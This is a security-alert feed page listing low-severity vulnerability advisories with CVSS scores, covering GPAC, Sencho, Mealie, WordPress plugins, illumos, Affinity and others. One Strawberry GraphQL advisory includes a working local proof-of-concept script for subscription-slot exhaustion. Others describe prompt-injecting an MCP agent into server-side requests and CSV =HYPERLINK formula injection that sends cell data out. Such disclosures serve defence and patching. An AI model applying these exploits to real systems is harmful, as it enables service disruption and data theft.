-Infinity
0
Severity
2.1
Use After Free, Buffer Overflow
AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L/E:P/RL:X/RC:C

A vulnerability was detected in GPAC up to 26.07.0. This affects the function gffqpop of the file filtercore/filterqueue.c of the component MP4Box. Performing a manipulation results in use after free. The attack may be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

First published (updated )
Severity
2.1
Use After Free, Buffer Overflow
AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:C

A security vulnerability has been detected in GPAC up to 26.07.0. The impacted element is the function gfmxv of the file utils/osthread.c of the component MP4Box. Such manipulation leads to use after free. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

First published (updated )
Severity
2.1
SSRF
AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C

A vulnerability was determined in Studio-Saelix Sencho up to 0.94.1. This vulnerability affects unknown code of the file outboundTarget.ts of the component git-sources Browse API Endpoint. Executing a manipulation of the argument repourl can lead to server-side request forgery. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The presence of this vulnerability remains uncertain at this time. This patch is called 79b86ddcd4aefdd6941f098e35990ab397b13c72. It is advisable to implement a patch to correct this issue. The vendor explains: "Git repository access is an intentional, privileged administrative function. Sencho explicitly supports repositories hosted on private LAN, VPC, VPN, CGNAT, and IPv6 ULA networks. The report does not demonstrate a privilege-boundary bypass or access by an unprivileged user. We therefore dispute the CVE characterization of this behavior. As defense in depth, we have nevertheless hardened repository access. Git HTTPS and SSH connections now validate and pin DNS resolution, reject loopback, link-local, multicast, selected special-use and metadata targets, disable redirects and inherited proxy routing, and retain strict SSH host-key verification."

First published (updated )
Severity
2
SSRF
AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:C

A vulnerability has been found in Studio-Saelix Sencho up to 0.97.1. Affected by this issue is the function isValidRemoteUrl of the file backend/src/utils/validation.ts of the component Add Remote Node API Endpoint. Such manipulation leads to server-side request forgery. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor confirms: "The node API URL could be configured by an authenticated user with node-management permission and used to initiate server-side requests. [T]he report demonstrates server-side request capability but not arbitrary internal response exfiltration."

First published (updated )
Severity
2.3
SSRF
AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N

Mealie 3.26.0 through 3.28.0 contains a server-side request forgery vulnerability in the OpenID Connect avatar fetch that ignores ports when allowlisting the identity provider hostname. Authenticated OIDC users who control their picture URL can make the server send GET requests to arbitrary ports on the provider's internal address on each login.

First published (updated )
Severity
2.3
SSRF
AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N

zotero-mcp 0.10.0 through 0.14.1 contains a server-side request forgery vulnerability that allows attackers to reach internal services because fetchembeddedmetadata fetches URLs without destination validation. Attackers can steer the agent via prompt injection into calling zoteroaddbyurl, causing requests to loopback, private, or link-local hosts directly or via redirects, leaking citation meta-tags and error details.

First published (updated )
Severity
2.3
AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N

OpenPanel through 2.3.0 contains a CSV formula injection vulnerability that allows unauthenticated attackers to embed spreadsheet formulas by supplying crafted profile IDs to the /track endpoint. Attackers can send tracking events with profile IDs like =HYPERLINK(...) matching a cohort, so exported cohort CSVs execute formulas that exfiltrate adjacent cell data.

First published (updated )
Severity
2.3
AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N

PairDrop through 1.11.2 contains an IP spoofing vulnerability in Peer.setIP that allows remote attackers to join other networks' discovery rooms by supplying a forged cf-connecting-ip header. Attackers who know a victim's public IP can appear as a local device on self-hosted instances not behind Cloudflare to send or receive files.

First published (updated )
Severity
2.3
SSRF
AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N

Kortix Suna 0.10.7 before 0.13.52 contains a server-side request forgery vulnerability that allows project managers to bypass the isPrivateIp guard by supplying IPv6 6to4 or Teredo addresses that embed private IPv4 destinations. Attackers holding project.connector.write can set connector baseurl, OpenAPI, Postman, or MCP URLs to reach internal services and cloud metadata endpoints and read responses.

First published (updated )
Severity
3.3
AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

ZTE Z80 Ultra has a local information disclosure vulnerability. Third-party applications can capture data returned by system interfaces to obtain device-related information.

First published (updated )
Severity
3.3
AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

ZTE Z80 Ultra has an interface permission validation vulnerability. The callable functions provided by the system lack sufficient access control. An attacker can leverage these functions to read relevant information.

First published (updated )
Severity
3.7
AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

The SpeedyCache – Cache, Optimization, Performance plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.2 via the 'commentauthor, commentauthoremail' parameter. This makes it possible for unauthenticated attackers to extract the full name and email address of returning commenters pre-filled into comment form input fields and persisted as the site-wide cached page by any unauthenticated attacker requesting the same public URL. The read-side handler in advanced-cache.php correctly skips cached delivery for requests carrying commentauthor cookies, but this check is absent on the write path, meaning the cache poisoning is invisible to the victim commenter yet fully exploitable by any unauthenticated attacker with no cookies.

First published (updated )
Severity
3.3
AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

ZTE Z80 Ultra contains an information disclosure vulnerability, through which third-party applications can read relevant information by hooking system APIs.

First published (updated )
Severity
2.2
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N

The Portfolio Filter Gallery WordPress plugin before 2.2.1 does not perform a per-object authorization check before deleting an attachment, allowing users with the Contributor role and above to permanently delete certain media attachments belonging to other users, including administrators.

First published (updated )
Severity
3.5
XSS
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N

The Rank Math SEO WordPress plugin before 1.0.280 does not escape a stored redirection source value before outputting it in an administrative list view, allowing users who can manage redirections (Administrators by default) to store JavaScript that executes in the session of any user who later opens that view, including a Super Administrator on multisite.

First published (updated )
Severity
3.1
AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N

The AI Puffer – Chat. Create. Automate. (formerly AI Power) plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.4.89. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify global site-wide semantic search settings, including vector provider, embedding provider, embedding model, target ID, number of results, and no-results text stored in aipkitoptions, that are otherwise restricted to administrators. Exploitation requires that an administrator has previously granted the Knowledge Base ('sources') module to the attacker's role via the Role Manager, as this access is not available to lower-privileged users by default.

First published (updated )
Severity
3.1
AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N

The AI Puffer – Chat. Create. Automate. (formerly AI Power) plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.4.89. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify global plugin indexing and vector-search configuration options (aipkittraininggeneralsettings and aipkitindexingfieldsettings), including chunking parameters, file upload visibility, and per-CPT field indexing settings, affecting all users of the plugin. This is only exploitable in configurations where an administrator has granted 'sources' module access to a lower-privileged role via the plugin's Role Manager.

First published (updated )
Severity
3.5
CSRF
AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

RequestTokenListener is the only generic REQUESTTOKEN validator in Contao and it only runs on POST. On the GET side the guard is local and declarative, and it only fires when an act parameter is present. Every back end action dispatched through a different parameter therefore has no CSRF protection at all. This is a family rather than a single bug.

Impact

An attacker who gets a logged in back end user to load a URL performs back end actions as that user, with no token and no confirmation. Because the exposure follows from the dispatch mechanism rather than from one callback, every present and future key= action inherits it.

Honest bound. The victim must be authenticated in the back end and must load the URL, and the reachable actions are limited to the modules that user can access. We have not found a key= action that grants privileges; the ones we verified are destructive or state changing rather than escalating.

First published (updated )
Severity
3.5
CSRF
AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

RequestTokenListener is the only generic REQUESTTOKEN validator in Contao and it only runs on POST. On the GET side the guard is local and declarative, and it only fires when an act parameter is present. Every back end action dispatched through a different parameter therefore has no CSRF protection at all. This is a family rather than a single bug.

Impact

An attacker who gets a logged in back end user to load a URL performs back end actions as that user, with no token and no confirmation. Because the exposure follows from the dispatch mechanism rather than from one callback, every present and future key= action inherits it.

Honest bound. The victim must be authenticated in the back end and must load the URL, and the reachable actions are limited to the modules that user can access. We have not found a key= action that grants privileges; the ones we verified are destructive or state changing rather than escalating.

1 / 2
Source: GitHub
First published (updated )
Severity
1.9
CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

A missing authorization check in the illumos zones statistics daemon (zonestatd) allows a local user in any zone to disrupt zonestat in other zones and to determine which zones are running. The zonestatd door server procedure, zsdserver() in usr/src/cmd/zonestat/zonestatd/zonestatd.c, handles the ZSDCMDNEWZONE command, which is intended to be sent by zoneadmd, without checking the caller's credentials. Because the zonestatd door is accessible to all users in every zone, an unprivileged user can send this command with an arbitrary zone ID, causing zonestatd to re-create its door file in that zone, so that new zonestat requests in that zone can fail while the file is replaced. The time taken to handle the command also reveals whether a given zone ID belongs to a running zone. The flaw has existed since 2010 (illumos-gate commit efd4c9b6), and affects any illumos distribution prior to illumos-gate commit 865b58d2.

First published (updated )
Severity
1.9
CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

A missing authorization check in the illumos IP management daemon (ipmgmtd) allows a local user to change the persistent IP multipathing (IPMP) configuration. The ipmgmtd door dispatch table in usr/src/cmd/cmd-inet/lib/ipmgmtd/ipmgmtdoor.c does not require the solaris.network.interface.config authorization for the IPMGMTCMDIPMPUPDATE command, although its handler, ipmgmtipmpupdatehandler(), writes to the persistent ipadm configuration when the IPMGMTPERSIST flag is set. An unprivileged local user can therefore add interfaces to, or remove them from, existing IPMP groups in the stored configuration. The running configuration is not changed; the modification takes effect when the stored configuration is next applied, such as at boot, and may disrupt network connectivity. The flaw has existed since 2021 (illumos-gate commit a73be61a), and affects any illumos distribution prior to illumos-gate commit e8d3efa1.

First published (updated )
Severity
3.7
AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

Summary

Strawberry's legacy graphql-ws subscription handler can retain task and subscription bookkeeping after a one-shot subscription has naturally sent its complete message. When the application configures maxsubscriptionsperconnection, the handler counts those completed operations in len(self.tasks). A client that uses distinct operation IDs can therefore reach the configured subscription limit even though the earlier subscriptions have already completed, causing subsequent legitimate subscriptions on the same persistent WebSocket connection to receive Subscription limit reached.

This is a conditional connection-level availability and resource-accounting issue. It requires explicit use of the legacy graphql-ws protocol, a persistent WebSocket connection, one-shot subscriptions that naturally complete, and a configured maxsubscriptionsperconnection limit. It is not an unconditional issue in a default Strawberry installation and is distinct from the previously fixed single-connection infinite-subscription issue.

Details

The audited snapshot is Strawberry 0.324.4, commit c3caabd1188acda62045e7fd9ba9e37ac430cf96. The relevant implementation is in [strawberry/subscriptions/protocols/graphqlws/handlers.py](https://github.com/strawberry-graphql/strawberry/blob/c3caabd1188acda62045e7fd9ba9e37ac430cf96/strawberry/subscriptions/protocols/graphqlws/handlers.py), particularly the operation-start, result-handling, and cleanup paths.

When a new operation is started, the handler rejects it once the task count reaches the configured limit:

python if ( self.maxsubscriptionsperconnection is not None and len(self.tasks) >= self.maxsubscriptionsperconnection ): await self.sendmessage( ErrorMessage( type="error", id=operationid, payload={"message": "Subscription limit reached"}, ) ) return

The operation task is stored in self.tasks, and its result source is stored in self.subscriptions. On normal exhaustion of the result source, handleasyncresults() sends a completion message:

python async for result in resultsource: await self.senddatamessage(result, operationid)

await self.sendmessage( CompleteMessage(type="complete", id=operationid) )

The natural completion path does not call cleanupoperation() before returning. The deletion of the stored operation state is implemented separately:

python async def cleanupoperation(self, operationid: str) -> None: if operationid in self.subscriptions: await self.subscriptions[operationid].aclose() del self.subscriptions[operationid]

self.tasks[operationid].cancel() await self.tasks[operationid] del self.tasks[operationid]

Consequently, after a one-shot operation has sent complete, its task entry can remain in self.tasks until the client explicitly stops the operation, reuses the same operation ID, or the connection is cleaned up. New operation IDs are compared against the retained task count and can be rejected.

The connection-slot impact requires both parts of the behavior:

1. the natural-completion path leaves the completed operation accounted for; and 2. the legacy handler has maxsubscriptionsperconnection enabled.

PoC

The following reproduction is local-only and bounded. It uses an in-memory Channels WebSocket fixture, one connection, three one-shot subscriptions, and the legacy graphql-ws subprotocol. It does not connect to a public endpoint or start a network service.

1. Environment installation

Create an isolated virtual environment and install the official Channels integration extra together with the local ASGI test dependency:

bash python -m pip install "strawberry-graphql[channels]==0.324.4" daphne

For a different tested release, replace 0.324.4 and record the actual installed version. The test uses an in-memory Channels communicator and does not connect to a real server.

Record the actual versions before testing:

bash python -c "import sys, importlib.metadata as m; print(sys.version); print('strawberry-graphql:', m.version('strawberry-graphql')); print('channels:', m.version('channels')); print('Django:', m.version('Django')); print('asgiref:', m.version('asgiref'))"

2. Save the bounded test

Save the following as poc.py:

python import asyncio

from django.conf import settings

if not settings.configured: settings.configure( SECRETKEY="local-validation-only", CHANNELLAYERS={ "default": { "BACKEND": "channels.layers.InMemoryChannelLayer", } }, )

import strawberry from channels.testing import WebsocketCommunicator

from strawberry.channels.handlers.wshandler import GraphQLWSConsumer from strawberry.schema import Schema from strawberry.subscriptions import GRAPHQLWSPROTOCOL

@strawberry.type class Query: @strawberry.field def ping(self) -> str: return "pong"

@strawberry.type class Subscription: @strawberry.subscription async def oneshot(self) -> str: yield "marker"

schema = Schema(query=Query, subscription=Subscription)

application = GraphQLWSConsumer.asasgi( schema=schema, subscriptionprotocols=(GRAPHQLWSPROTOCOL,), maxsubscriptionsperconnection=2, )

async def receiveuntilcomplete(communicator, operationid): messages = [] for in range(3): message = await asyncio.waitfor( communicator.receivejsonfrom(), timeout=2 ) messages.append(message) if ( message.get("type") == "complete" and message.get("id") == operationid ): return messages raise AssertionError( f"no complete message for {operationid}: {messages}" )

async def main() -> None: communicator = WebsocketCommunicator( application, "/graphql", subprotocols=[GRAPHQLWSPROTOCOL], ) connected, acceptedprotocol = await communicator.connect() assert connected assert acceptedprotocol == GRAPHQLWSPROTOCOL

try: await communicator.sendjsonto({"type": "connectioninit"}) ack = await communicator.receivejsonfrom() assert ack["type"] == "connectionack"

query = "subscription { oneShot }"

await communicator.sendjsonto( { "type": "start", "id": "one", "payload": {"query": query}, } ) firstmessages = await receiveuntilcomplete( communicator, "one" )

await communicator.sendjsonto( { "type": "start", "id": "two", "payload": {"query": query}, } ) secondmessages = await receiveuntilcomplete( communicator, "two" )

# Allow completed handler tasks to finish their sends before the # third operation is started. await asyncio.sleep(0)

await communicator.sendjsonto( { "type": "start", "id": "three", "payload": {"query": query}, } ) thirdmessage = await asyncio.waitfor( communicator.receivejsonfrom(), timeout=2 )

print( { "first": firstmessages, "second": secondmessages, "third": thirdmessage, } ) finally: await communicator.disconnect()

asyncio.run(main())

3. Run

bash python poc.py

4. Expected results

A fixed implementation should send data and complete for both one and two, then permit three to start and complete.

The behavior is:

text { 'first': [ {'type': 'data', 'id': 'one', 'payload': {'data': {'oneShot': 'marker'}}}, {'type': 'complete', 'id': 'one'} ], 'second': [ {'type': 'data', 'id': 'two', 'payload': {'data': {'oneShot': 'marker'}}}, {'type': 'complete', 'id': 'two'} ], 'third': { 'type': 'error', 'id': 'three', 'payload': {'message': 'Subscription limit reached'} } }

The exact formatting and fields may vary slightly by Strawberry version, but the decisive observation is that one and two both receive complete, while three receives Subscription limit reached with a different operation ID.

Impact

When the legacy graphql-ws protocol and maxsubscriptionsperconnection are enabled, a client can fill the configured operation slots on its persistent connection with one-shot subscriptions that have already completed. Subsequent legitimate operations on that connection may be rejected even though no corresponding subscriptions remain active.

The primary demonstrated impact is connection-level availability and incorrect resource accounting. Multiple long-lived connections could increase the amount of retained task/subscription state, but this bounded test does not establish memory exhaustion or cross-connection denial of service.

Exposure depends on:

- the application explicitly enabling the legacy graphql-ws protocol; - the application configuring maxsubscriptionsperconnection; - clients being able to maintain a persistent WebSocket connection; - the resolver exposing a finite operation that naturally completes; - the absence of effective connection lifetime, connection-count, authorization, or rate limits.

This report does not claim impact on the modern graphql-transport-ws protocol, on applications without the per-connection cap, or on every deployment. It is distinct from the already fixed unlimited-subscription behavior.

Maintainer note

Confirmed and reproduced against 0.327.0. The maxsubscriptionsperconnection feature this affects was introduced in 0.312.3 (#4344), so the affected range is >= 0.312.3, <= 0.327.0.

Fixed by https://github.com/strawberry-graphql/strawberry/pull/4610: operations now release their slot when they complete on their own or fail before execution, and a late stop for a completed operation is a no-op. The fix was released in 0.327.2.

First published (updated )
Severity
3.6
AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:L

The Affinity by Canva application before 3.3.1 (October 2026 release) did not perform adequate bounds checking when parsing arrays of strings in Affinity document files, leading to a heap buffer over-read. A threat actor could craft an Affinity document that, when opened by a user in Affinity, could disclose the contents of adjacent heap memory in the document's text or result in an application crash.

First published (updated )
Severity
3.6
AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:L

The Affinity by Canva application before 3.3.1 (October 2026 release) did not correctly handle incomplete UTF-8 character sequences when parsing text in Affinity document files, leading to a heap buffer over-read. A threat actor could craft an Affinity document that, when opened by a user in Affinity, could disclose the contents of adjacent heap memory in the document's text or result in an application crash.

First published (updated )
Severity
3.6
AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:L

The Affinity by Canva app for macOS before 3.3.1 (October 2026 release) did not perform adequate bounds checking when generating QuickLook thumbnails and previews of Affinity document files, leading to an out-of-bounds heap read. A threat actor could craft an Affinity document that, when displayed or previewed by a user in Finder, could disclose the contents of adjacent heap memory, including memory addresses, in the rendered thumbnail or preview image.

First published (updated )
Severity
2.9
AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

The Affinity by Canva application for macOS before 3.3.1 (October 2026 release) did not validate image dimensions against the size of the pixel data when generating QuickLook thumbnails and previews of Affinity document files, leading to an out-of-bounds heap read. A threat actor could craft an Affinity document that, when displayed or previewed by a user in Finder, could disclose the contents of adjacent heap memory in the rendered thumbnail or preview image, or cause the thumbnail or preview extension to crash.

First published (updated )
Severity
3.6
AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L

The Affinity by Canva app before 3.3.1 (October 2026 release) did not perform adequate bounds checking when parsing Affinity document files, leading to an out-of-bounds pointer dereference. A threat actor could craft an Affinity document that, when opened by a user in Affinity, could result in an application crash.

First published (updated )
Severity
3.7
AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Dell Secure Connect Gateway (SCG) Policy Manager, versions prior to 5.34.00.16, contains a Generation of Error Message Containing Sensitive Information vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure and Information exposure.

First published (updated )
Severity
3.8
AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L

Dell Secure Connect Gateway (SCG) Policy Manager, versions prior to 5.34.00.16, contains an Improper Check for Unusual or Exceptional Conditions vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Information tampering and Protection mechanism bypass.

First published (updated )
Severity
3.1
AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N

Dell Secure Connect Gateway (SCG) Policy Manager, versions prior to 5.34.00.16, contains an Improper Validation of Specified Type of Input vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information exposure and Information tampering.

First published (updated )

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203